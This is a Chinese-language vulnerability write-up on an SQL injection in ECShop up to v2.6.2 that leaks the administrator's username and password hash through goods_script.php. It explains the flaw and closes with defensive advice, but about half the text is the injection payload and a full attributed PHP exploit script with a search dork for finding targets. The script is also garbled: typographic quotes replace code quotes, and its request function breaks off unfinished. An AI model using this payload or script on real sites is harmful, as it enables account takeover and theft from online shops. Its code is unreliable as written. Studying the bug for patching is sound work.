ECShop <= v2.6.2 SQL注入漏洞深度解析:管理员凭据泄露的完整攻击链
在电商系统安全漏洞史上,ECShop早期版本曝出的一个高危安全问题,至今仍是经典的教学案例。它深刻揭示了,即便是成熟的商业软件,一处细微的编码疏忽也可能导致整个系统防线崩溃。本文将深入剖析发生在goods_script.php文件中的SQL注入漏洞,完整还原其如何被利用来窃取管理员账号与密码。
漏洞根源剖析:未初始化变量的致命隐患
漏洞的核心位于goods_script.php文件的第44行附近。其根本原因在于一个关键变量未被正确初始化。让我们直接查看关键代码片段:
复制代码
代码如下:if (empty($_GET['type']))
{
…
}
elseif ($_GET['type'] == ‘collection’)
{
…
}
$sql .= ” LIMIT ” . (!empty($_GET[‘goods_num’]) ? intval($_GET[‘goods_num’]) : 10);
$res = $db->query($sql);
你是否发现了问题?关键在于$sql变量。在代码追加LIMIT子句之前,$sql变量并未在任何分支中被明确初始化或赋值。这意味着,攻击者可以通过控制type参数,巧妙地绕过所有前置条件判断,使程序直接执行一个由外部输入、且未经任何过滤的SQL语句片段。这种变量未初始化的低级错误,实质上为SQL注入攻击敞开了大门。
漏洞利用详解:从SQL注入到管理员密码窃取
理解了漏洞原理,攻击路径便清晰可见。攻击者的核心目标是构造一个特殊的type参数值,使程序跳过所有合法分支,直接执行攻击者通过sql参数注入的恶意SQL语句。典型的利用方式是通过发送一个精心构造的POST请求来实现。
攻击载荷的核心SQL语句如下:sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#。这条语句完成了以下关键操作:
1. 从管理员数据表ecs_admin_user中,查询拥有最高权限(action_list字段值为‘all’)的管理员账户。
2. 使用CONCAT函数将用户名与经过MD5加密的密码哈希值用冒号连接起来。
3. 将结果集的列名别名为goods_id,以匹配漏洞代码的上下文环境。
4. 使用#符号注释掉后续可能存在的原生SQL代码,确保注入语句完整执行。
利用脚本发送请求后,会从服务器返回的HTML页面源码中,通过正则表达式提取出泄露的管理员用户名和密码MD5哈希值。一旦成功,攻击者便获得了后台系统的最高权限凭证,后续可进行任意操作,危害极其严重。
自动化利用脚本全览
以下是完整的自动化漏洞利用脚本。再次强调,此脚本仅用于安全研究、渗透测试教学及漏洞验证,严禁用于任何未授权的非法攻击行为。
复制代码
代码如下:#!/usr/bin/php
print_r(’
+—————————————————————————+
ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: https://bbs.wolvez.org
dork: “Powered by ECShop”
+—————————————————————————+
’);
/**
* works with register_globals = On
*/
if ($argc < 3) {
print_r(’
+—————————————————————————+
Usage: php ‘.$argv[0].’ host path
host: target server (ip/hostname)
path: path to ecshop
Example:
php ‘.$argv[0].’ localhost /ecshop/
+—————————————————————————+
’);
exit;
}
error_reporting(7);
ini_set(‘max_execution_time’, 0);
$host = $argv[1];
$path = $argv[2];
$resp = send();
preg_match(‘#href=”“([\S]+):([a-z0-9]{32})”“#’, $resp, $hash);
if ($hash)
exit(“Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n”);
else
exit(“Exploit Failed!\n”);
function send()
{
global $host, $path;
$cmd = ‘sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x’.bin2hex(‘all’).’ LIMIT 1#’;
$data = “POST “.$path.”goods_script.php?type=”.time().” HTTP/1.1\r\n”;
$data .= “Accept: */*\r\n”;
$data .= “Accept-Language: zh-cn\r\n”;
$data .= “Content-Type: application/x-www-form-urlencoded\r\n”;
$data .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n”;
$data .= “Host: $host\r\n”;
$data .= “Content-Length: “.strlen($cmd).”\r\n”;
$data .= “Connection: Close\r\n\r\n”;
$data .= $cmd;
安全反思与防御总结
ECShop这个漏洞的成因极具代表性:首先是对用户输入参数缺乏严格的验证与过滤,其次是关键变量在缺乏安全默认值的情况下被直接使用。这为所有Web开发者敲响了警钟:必须对所有外部输入参数保持高度警惕,严格遵循“最小权限原则”与“默认安全(Secure by Default)”的编码规范。对于仍在使用受影响旧版本ECShop的网站管理员而言,最根本的解决方案是立即升级至官方发布的最新安全版本。
信息安全往往系于细节。一个未被初始化的$sql变量,就足以导致整个电商系统的管理员权限沦陷。这不仅仅是一个技术漏洞,更是对安全开发生命周期(SDLC)和安全意识的一次深刻警示。
